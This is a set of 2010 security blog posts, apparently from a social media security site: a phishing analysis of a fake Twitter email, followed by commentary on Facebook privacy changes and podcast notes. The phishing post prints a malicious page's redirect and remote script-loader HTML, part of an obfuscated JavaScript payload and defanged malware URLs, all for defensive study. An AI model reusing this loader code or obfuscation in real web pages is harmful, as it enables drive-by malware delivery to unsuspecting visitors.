Interesting New Twitter Phish Can Lead to Bad Places

I’ve had several fake emails that initially look like they come from Twitter in my inbox recently.  I didn’t think anything of it until several of my friends forwarded me the same type of email.  This suggests two things: one, that these emails are starting to hit a larger audience, or two, that they are targeting just my friends and me, which is totally possible. :-) Anyway, here is a quick bit of analysis of one of these emails.  I found some interesting things when I investigated the website linked in the fake email.  The link in this particular email could have done more damage if it wasn’t for some crappy attacker code.  Read on!

The Email
The following screen shot shows you what the email looks like.  It seems to come from Twitter, but you will notice some interesting clues that tell you this isn’t real.  First, the Twitter account mentioned is just the first part of the email address this was sent to.  This may or may not be your Twitter ID.  Second, check out the “Britney Spears home video feedback” subject line and the “Antidepressants for your bed vigor” in bold red in the message body.  Yep.  All the signs that this isn’t from Twitter.  OK, nothing to see here, right?

The Link
When you look at the source of the email, the link actually goes to “hxxp://89.161.148.201/cekfcq.html”. If you do click on this link several things happen:

An HTML page is loaded which redirects you to a shady Russian software site.  This site (software-oemdigital.ru) has had a ton of phishy-looking domains assigned to it since 6/11/2010.  The HTML file also loads a script which runs a PHP file on another server.  Let’s take a look at the response:

HTTP/1.0 200 OK
Connection: close
Content-Length: 250
Content-Type: text/html
Date: Wed, 23 Jun 2010 15:09:53 GMT
Last-Modified: Wed, 23 Jun 2010 08:30:01 GMT
Server: IdeaWebServer/v0.70

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<META HTTP-EQUIV="refresh" CONTENT="0;URL=hxxp://software-oemdigital.ru">
<title></title>

<html><head>
</head></html><script src=hxxp://eurolisting.net/Cgi-bin/markprint.php ></script>

The Russian software site loads as normal but something else is going on in the background from eurolisting.net and that PHP file.  Here is the response:

HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Jun 2010 17:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1287414902; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/javascript

// <script>
function cxx(wcH){return wcH.replace(/%/g,'').replace(/['ow:Y]/g,fUp)}
cPH7j='d:6fcY75meY6et.Y77rio74w65(Y22o3cdiv stylew3d:5cY22pw6fsitio6fnY3aaw62so6fl:75o74Y65o3b lefto3a:2d1000pxY3bw20tY6fp:3aw2d10w300pxw3bo5cw22:3ew22Y29w3b:66unctiY6fn :6973(a)o7bdY6fcu:6deY6et.w77rw69te(:22:3cifrao6d:65w20srcw3do5co22httw70Y3ao2f <SNIP>

All of the stuff following the script tag is obfuscated JavaScript.  I cut most of it out as it is quite lengthy.  Running this through jsunpack (a JavaScript unpacker) shows that the script tries to load several things, including some VBScript that seems to check system properties, whether you are running Firefox, whether you have Java and/or Flash enabled, and what seems to be a check for Adobe Reader plug-ins.  You can check out the script and the unpacked version over at the jsunpack site.

Now this is where it gets interesting.  In Internet Explorer the PHP file seems to generate a request to a URI that doesn’t exist: hxxp://89.161.148.201/zzz/ttt/ad3740b4.class, which 404s.  You can also see this in the Wireshark capture below:

In Firefox it’s a different story.  The Russian software site still loads and something else attempts to get requested:

hxxp://wiki.insuranceplanningaz.com/main.php?h=89.161.148.201&i=JcmridQaq/ykgRj4UMpOy5Ec&e=4

This site will lead to some fun “fake AV” which prompts you to download a “setup.exe” file.

You probably don’t want to run that file.  The good news is that if you have the latest version of Firefox it will flag this as a reported web forgery and try to prevent you from going there.  One problem I see is that if you are running an older version of Firefox you might not get this notification.  I haven’t tested this with other browsers, so your results may vary.

What does this all mean?  Well of course don’t click on shady emails like this.  You know better right?  Also, don’t think that because you use Firefox you are safe from attacks like these!  Attackers are catching on and I would suspect we will see more attacks targeting multiple browsers besides IE.  Wait, too late isn’t it?  Special thanks to Greg and Tyler for providing intel about these domains and some of the analysis.



Social Media Security Podcast 15 – Current Facebook Security Issues, New Privacy Tools, Likejacking, Formspring, Social Media at Work

This is the 15th episode of the Social Media Security Podcast recorded June 11th, 2010.  This episode was hosted by Tom Eston and Scott Wright.  Below are the show notes, links to articles and news mentioned in the podcast:

Please send any show feedback to feedback [aT] socialmediasecurity.com or comment below.  You can also call our voice mail box at 1-613-693-0997 if you have a question for our Q&A section on the next episode.  You can also subscribe to the podcast in iTunes. Thanks for listening!

Facebook Privacy & Security Guide Updated to v2.2

I have updated the Facebook Privacy & Security Guide to version 2.2 over on SocialMediaSecurity.com.  If you’re not familiar with the guide it is an easy to use guide which helps you set the recommended privacy and security settings on your Facebook account.  It’s free, printable and meant to be shared.

This update includes details on all the recent changes to Facebook’s privacy settings that went live May 26, 2010.  I have also included more information on “Instant Personalization”, removing yourself from “Platform”, and how your public information can be accessed via the Facebook Graph API.  Note that you may not have these settings enabled on your Facebook profile…yet.  They are slowly being rolled out to the Facebook user base and may take a few weeks.  Please share with friends, family and others!

Download the latest version of the Facebook Privacy & Security Guide here.



My Thoughts on the New Facebook Privacy Controls

Ever since I started the Facebook Privacy & Security Guide back in October 2008 I knew that Facebook’s privacy settings were confusing for the average user.  Many of my concerns back then centered around friends and family that had no idea there were even privacy settings to configure on Facebook.  It has also never been in Facebook’s financial interest to *really* show you how to protect the information you post.  These are all reasons why I started the guide, and hopefully over the last few years it has helped spread some awareness on how to control the information you post a little better.  Working on the guide has been frustrating at times because Facebook would make settings more confusing, remove settings that were useful and then bring them back again in some other form.  In the latest versions of the guide I often wondered how I was going to fit all the settings and their explanations into a two-sided handout.  The handout format has always been important to me so it could be easily distributed. :-)

Jumping forward to today we see yet another iteration of these settings.  I don’t have the settings on my Facebook account yet so I haven’t updated the guide but I have read some of the information already out there.  The EFF has a good post up about the new settings.  They even have a YouTube video showing you the changes and their recommendations.  The other post you should read is one by theharmonyguy who, as always, has very good analysis of these settings and Facebook overall.

My thoughts are pretty much along the same lines as the EFF and others.  However, I will say that no matter what changes Facebook makes to their privacy settings they *will* find ways to use your information to make money.  This is Mark Zuckerberg’s business model and that won’t change anytime soon.  I will leave you with a fantastic quote that I think sums up all the media drama leading up to these new privacy controls.  This is a quote from Bruce Schneier.  It’s from an article he did for Forbes regarding statements that “Privacy is Dead”:

“It’s just not true. People, including the younger generation, still care about privacy. Yes, they’re far more public on the Internet than their parents: writing personal details on Facebook, posting embarrassing photos on Flickr and having intimate conversations on Twitter. But they take steps to protect their privacy and vociferously complain when they feel it violated. They’re not technically sophisticated about privacy and make mistakes all the time, but that’s mostly the fault of companies and Web sites that try to manipulate them for financial gain.”



Facebook Backtracks on Privacy Controls and Public Information

Facebook CEO Mark Zuckerberg held a press conference today announcing significant changes to the site’s privacy settings. The latest updates come after weeks of debate and criticism over Facebook’s handling of user information. Though it may take several days or weeks to roll out the new controls, an official privacy guide provides a summary of how they work. Full details are still rolling in, but certain aspects are already clear.

First, the new interface for making many changes appears to be much more streamlined. This should be a welcome change to those confused by the previous litany of options. The primary privacy page displays a table with columns for “Everyone,” “Friends of Friends,” and “Friends Only,” with rows for several categories of content. This table not only establishes settings for certain bits of profile information; it also lets users set defaults for new content shared.

Second, Facebook has removed the requirement that “connections,” such as your list of friends and the pages you “like,” always be publicly available information. A secondary page will provide access controls for certain groups of these connections, as well as who can friend you, send you messages, or see your profile in search results.

Third, users will have new options related to third-party applications that integrate with Facebook. The company had previously announced a granular permissions model for applications, and developers are in the process of transitioning to the new setup. Those permissions will now be reflected in the privacy settings, though how that will look is not yet clear. (Also, Facebook’s privacy guide assures users that applications can only request “information that’s needed for them to work,” but that’s up to developers.) Facebook is also re-instating an option to completely opt-out from the Facebook Platform. This setting had been available prior to changes last fall. However, it now appears that this opt-out will also be the only way to avoid public content being indexed by search engines.

Zuckerberg promised an “easy” way to opt-out of the controversial instant personalization program, which lets certain third-party websites automatically identify Facebook visitors, but the feature remains opt-out. Many of the other privacy settings are also still opt-out in that the site defaults appear to remain the same, presented as “Recommended” when a new user checks them.

I’ve been concerned about the tone of some Facebook responses to recent privacy concerns, and today’s presentation by Zuckerberg was no exception. He noted that the company had not seen any noticeable impact on site usage lately, and according to one report commented, “Perhaps the personal privacy preferences of liberal advocacy groups and DC politicians don’t match with those of the general public.” That may be true, though I think politicians or privacy advocates have a deeper understanding of recent changes than the general public. Still, this sort of remark comes across as at best somewhat irritated and at worst rather arrogant. It also probably won’t win over any liberal advocacy groups or DC politicians. (For the record, I don’t fall into either category.)

Other aspects of the announcements lead me to wonder how much Facebook truly understands the rising worries over the site’s handling of privacy issues.  Zuckerberg emphasized the site’s focus on sharing, that users want to share, and his belief that people want to share more openly. The default privacy options clearly reflect this belief, positioning Facebook as a site generally intended for public sharing.

But I think Zuckerberg is confusing the desire to share easily or freely and the desire to share publicly. Several researchers have explored how people approach privacy, and people constantly use services such as Facebook to post content they would not want distributed to the entire Internet. We’ve become accustomed to the idea of being private in public, since our offline conversations in public settings are not recorded and indexed for anyone to search. What would be the harm to users if content was private by default, but could be opened to the public if the author wanted that? After all, this is how Facebook operated for the first few years of its existence – and it likely played a significant role in the site’s growth.

Of course, while an opt-in approach may help many users, Facebook wants users to share more openly. More public content provides more value for other services that might integrate with Facebook, extending the site’s reach and influence. That’s part of why I find it difficult to simply accept Zuckerberg’s notion that most people are moving towards public sharing on their own: regardless of what individuals think, Facebook itself certainly has an opinion on how much you should share.

And that’s the real question – how much you share, not whether you share. I’ve never been opposed to making it easier for users to share content. But I do have a problem when a site that was built on sharing with a limited audience reorganizes to make that same type of sharing more difficult than fully public sharing – an activity that carries far more potential dangers, both social and otherwise.

Facebook has built an unprecedented audience of users who give it significant trust. I’m glad to see the company making welcome changes which assist users who actively care about privacy controls. But I remain concerned that the company’s overall perspective still reflects questionable ideas, such as the notion most people are not concerned about privacy, and either fails to recognize the company’s role as a trend-setter or ingenuously downplays it. That’s not a personal attack on Zuckerberg, whom I’ve never met, or anyone else at Facebook. It’s simply my evaluation of the service’s direction based on recent features and public relations. And I think Facebook owes its users much better.

Social Media Security Podcast 14 – Recent Facebook Hacks and Controversy, Diaspora, Swipely

This is the 14th episode of the Social Media Security Podcast recorded May 14th, 2010.  This episode was hosted by Tom Eston and Scott Wright.  Below are the show notes, links to articles and news mentioned in the podcast:

Please send any show feedback to feedback [aT] socialmediasecurity.com or comment below.  You can also call our voice mail box at 1-613-693-0997 if you have a question for our Q&A section on the next episode.  You can also subscribe to the podcast in iTunes. Thanks for listening!

Quitfacebookday.com happens on May 31, 2010 – Should you quit, too?

It seems like maybe I talk too much about Facebook security. But it’s a growing issue in the news these days. As you can see from the image next to this blog post on my website, one of the most searched terms in Google is now “How do I delete my Facebook account?” (In fact, as of today, if you type “Delete” into a Google search, the top suggestion is “Facebook account”.) So, I’m debating quitting Facebook on May 31 with the others who are disgusted with the site’s disregard for privacy and security. (See http://www.quitfacebookday.com)

My reasons include:

(1) You can’t seem to depend on anything you put there to be kept private – more due to constant policy changes than hackers;

(2) Facebook is now one of the biggest sources of phishing scams on the Internet, which are causing real losses;

(3) On any given day, the privacy of your data may depend on your FRIENDS’ settings, not just yours;

(4) Very few people are able to decipher the privacy settings to choose meaningful rules, which leaves them exposed – even me;

(5) Facebook shares your data with other sites (through the Open Graph API, the Like Button or Instant Personalization) in ways that can cause embarrassment and lead to identity theft;

(6) Facebook does not appear to be abiding by its agreement with the Privacy Commissioner of Canada to improve its handling of private information. (http://www.priv.gc.ca/media/nr-c/2009/let_090827_e.cfm)

Arguments against quitting Facebook include:

(1) All the “hip” young people say “Privacy is dead. Build a bridge and get over it…”

– Chanting this may make them feel good, but doesn’t change the fact that the easiest place to be scammed or have your password stolen is through social media sites that have very weak security and authentication. People must still care about their privacy, if only to ensure that persecution and other politically motivated abuses don’t victimize innocent people – it’s a slippery slope.  Privacy commissioners have a very difficult job these days. But it is an increasingly important one.

(2) How will I connect to friends and family without Facebook?

– How did you do it in 2003? It also depends on whether you use Facebook for “reading” or “writing” or “both”. If you just like to “see” what’s going on, you can use Twitter, with the caveat that you need to be careful of those short URLs that can take you to dangerous places. But tools like Brizzly.com can expand the links for you, so you’ll know where they are leading you. However, if you like to write lots of personal details of your life, and only want to share it with friends, that’s the biggest challenge right now – because even Facebook doesn’t provide assurance that your private posts won’t be shared with people you might not want to see them. There aren’t many tools that are widely used and can do this. But they are coming. So, maybe it’s better to wait.

(3) One person quitting from a group of 400 Million isn’t going to make a difference.

– It’s true that the numbers make this initiative look futile. So, for most people, quitting won’t make a difference to anyone. But if you are a person of authority, especially a security or privacy authority, your actions can show the people around you that this is a serious issue. Parents telling their kids that they are quitting – and why – may or may not have an impact (depending on whether the ear-plugs are in or not).

Public figures like Leo Laporte can have a significant effect on their followers. (Click HERE for the story which includes a link to the WikiHow page on how to quit Facebook)

As a security consultant who has been following this trend, I am asking people to take it seriously. If you are a security manager in a company, you can also have an influence on your co-workers, as long as they don’t see you as being heavy-handed, or crying “wolf” – which may be unavoidable in some cases.

(4) If all the security and privacy advocates quit Facebook, who will counsel those who still use it to let them know about the risks in their own “element”?  Good question. I don’t have an answer to that one. I may leave a Facebook page up (which is different from a personal profile). That way, people can still reach me and see what I have to say, publicly, and maybe understand why I no longer have a personal profile… and maybe they shouldn’t either.

What will the future of social networking look like?

I believe something will come along that is more secure than Facebook, and will provide the connections we need – without as much risk. But it may take a while. There is an initiative called Diaspora (http://www.joindiaspora.com/), which has this very intent. While its initial incarnation seems to have a few serious weaknesses of its own, this is the kind of thing that needs to happen to combine a great vision for social networking with a level of trust that can be sustained.

So, what do you think?

(1) Should I quit Facebook on May 31? or sooner?

(2) Will you quit Facebook?

Feel free to comment below. (NOTE: If all you plan to say is “Privacy is Dead”, get ready for a flaming arrow!)

Here’s how to delete your facebook account – http://www.wikihow.com/Permanently-Delete-a-Facebook-Account


I am now offering monthly briefings, tailored to organizations that want to build and sustain security awareness for staff. Just because your security team is too busy to do its own training and awareness doesn’t mean you can’t have an economical way to address human security risks. Please call or email me at the coordinates below…

Scott Wright

The Streetwise Security Coach

Join the Streetwise Security Zone at:
http://www.streetwise-security-zone.com/join.html

Phone: 1-613-693-0997
Email: scott@streetwise-security-zone.com
Twitter ID: http://www.twitter.com/streetsec

To receive weekly security tips and other notices about helpful content available on this site, please make sure you are on my list by clicking HERE, and entering your name and email address.


Why the Current Facebook Privacy Debate Matters

Privacy has been a hot topic of discussion among all sorts of technology-minded people lately. But take a moment to consider why this debate is even happening. One could list several events involving several companies that have all influenced the controversy, but generally, much of the talk stems from changes made by Facebook over the past year.

Why the Change?

And why did Facebook make those changes? There’s no technological reason for many of them. Nothing about liking pages or using social plug-ins forced the company to remove old access controls or make “instant personalization” an opt-out feature. Facebook’s executives made a policy and business decision to push users into more public sharing. In many ways, we’re having this debate because Facebook chose to make it an issue.

That’s not a criticism, simply an observation. In fact, many would probably say that Facebook was right to challenge ideas on privacy. Popular tech blogger Robert Scoble has repeatedly argued that Facebook’s changes bring many benefits to users. One writer at Fortune questioned any backlash and gave this response to Pandora’s new social setup: “My first reaction? Creepy! My second reaction: Cool!” Is it wrong to force users into a new situation that’s uncomfortable at first if it ultimately brings significant value?

In this case, however, the ultimate value to users remains unclear. Many users will certainly find advantages to a freer flow of information. But does Facebook really have the right to decide whether content people had previously restricted should now be available publicly? How can any of us judge whether the benefits outweigh the downsides for each user? Many users chose to put information in their profiles that they did not want shared beyond certain limits. If exposing that information seems trivial, are you certain you understand why the profile owner thought limits so important to begin with?

I would argue that by pushing the envelope on our understanding of privacy, Facebook’s leadership made changes that benefit the company, partly by also benefiting developers and partners. That’s not necessarily a bad thing – Facebook is a business and has to make money. But while those changes do benefit some users, perhaps even a majority of users, they also harm the trust of many other users who had shared private content on Facebook.

Where’s the Backlash?

In the short term, the benefits outweighed the downsides for Facebook. Several high-profile users have deleted their accounts, and others are following suit. But keep in mind that even if 10 million people stopped using the site, that would only be a 2% reduction in user base.

As the company faces widespread criticism and possible regulatory changes, you might expect Facebook to back down on some of their changes. I doubt it. Facebook’s executives know the company enjoys a very strong position in the market right now. They can afford losing 2% of users without breaking a sweat. And if people do leave, where will they go?

Given that level of security, why bother talking about Facebook privacy? Why does it matter if techie types bail on the service? Should we simply get used to having less control and move on?

To put it another way, should we let Facebook dictate our understanding of online privacy?

I realize Facebook will probably never go back to the way it once was and that there’s essentially no hope of meaningful competition in the short term. Yet Facebook didn’t reach this place overnight. Industry shifts take time. And many influential people in technology are often on the bleeding edge of such shifts.

Is Privacy Dead?

For the time being, though, Facebook users will likely react in one of three ways. First, they may not understand the implications of updates and keep using the site as before. Second, they might embrace the new capabilities and voluntarily unleash more content. Third, they will decide that they derive too much value from Facebook to let it go, and thus will, perhaps begrudgingly, keep their account – but they’ll be far more careful about what they post in the future.

I suspect that as awareness grows of how much data Facebook now distributes, many people will take more precautions in using the site. That’s not necessarily a bad thing – I’ve long argued for increased education of online dangers. People need to be careful online, regardless of how “private” a service seems. But care is not the same as paranoia or having to manage your identity the way a celebrity might. If Facebook wanted to increase intimacy and authenticity among online friends, they may find they’ve actually done the opposite.

Some people, such as Scoble or perhaps Mark Zuckerberg, have chosen to live their lives with “radical transparency.” Most of us probably still want to keep certain information private, and yet we routinely share that information with parties we trust – even online. I use my credit card number when shopping at Amazon, but I’d prefer they keep it to themselves. When I filled out web-based job applications last year, I often had to disclose my social security number – a small bit of data I would not want passed around. In a more offline example, I’ve often shared personal struggles with close friends in other states by talking with them on my mobile phone.

I realize that a determined hacker could possibly steal my payment info or even my SSN when I send that data to websites. I also know that my phone can be tapped or that my friends could repeat our conversations to others. But based on a wealth of factors, I make a decision to take those risks, since I judge the likelihood of these scenarios (especially given certain precautions I take) to be minimal.

The idea that any data you transmit to another computer should be considered public has significant merit. In practice, though, much of our offline lives face the same technical threat of publicity, and channels have long existed to share electronic data with only a limited audience. Most of us would not want the entire world to see all of our e-mails, and a range of businesses let only certain people access certain servers.

Which brings me back to one of my original points: nothing forced Facebook in a direction away from privacy. They chose it. I doubt whether they would have around 500 million users today if they had chosen that direction years ago. But even if Facebook now thinks I should share all of my content with everyone, I still find value in keeping some information limited. For me, that’s the essence of online privacy. And while one website with a very large audience may have reduced privacy by keeping me from using their features in a limited way, I will continue to exercise control over my data in other ways.

What Now?

The current debate about Facebook and privacy may seem confusing, futile, or even pointless. But it’s important to evaluate the background and ramifications of Facebook changes, especially given the company’s influence on industry trends. It’s important to realize that visible competition and meaningful alternatives to Facebook will require months or even years of development. And it’s important to understand how much privacy still plays a role in the way people manage and share information, whether online or offline.

Perhaps Facebook will end up right, and most people will move away from old ideas about privacy. But I’d rather see companies educate users on new features and empower them to choose more public sharing rather than expose previously private content and encumber such a change with illusory settings. Facebook may try to say most people don’t mind their new take on privacy, but I think they’ll find this debate is far from over.
